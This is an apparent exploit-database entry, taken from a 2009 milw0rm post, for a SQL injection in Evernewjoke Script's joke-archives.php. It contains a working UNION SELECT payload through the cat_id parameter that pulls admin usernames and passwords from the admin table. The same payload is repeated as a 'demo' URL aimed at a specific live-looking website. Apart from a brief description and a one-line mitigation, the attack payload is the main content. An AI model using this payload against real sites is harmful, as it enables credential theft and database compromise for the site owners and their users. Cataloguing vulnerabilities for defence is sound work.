Evernewjoke Script

vendor:

Evernewjoke Script

by:

taRentReXx

CVSS

HIGH

SQL Injection

CWE

Product Name: Evernewjoke Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'start' and 'cat_id' parameters to 'joke-archives.php' script. A remote attacker can execute arbitrary SQL commands in application's database, inject arbitrary HTML and script code, access or modify sensitive data, exploit vulnerabilities in the underlying database and operating system, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

@~~=======================================~~@
       ============taRentReXx===================
		  The Indian Hacker
@~~=======================================~~@

@~~=Author   : taRentReXx

@~~=Email    : darkxr00tx@gmail.com

@~~===============INDIAN=================~~@


@~~=======================================~~@
@~~=Script   : Evernewjoke Script

@~~=S.Site   : http://www.evernewscripts.com/2009/02/free-joke-script/

@~~=Demo     : http://www.evernewjokes.com/
@~~=======================================~~@



@~~=Vul file :joke-archives.php

@~~=Exploit :-

		joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--


		!! DEMO !!:-

		http://www.evernewjokes.com/joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--



@~~=======================================~~@
@~~=======================================~~@

Greetz to all muslims brothers.
to all indians
to milw0rm

@~~===============INDIAN=================~~@

# milw0rm.com [2009-05-27]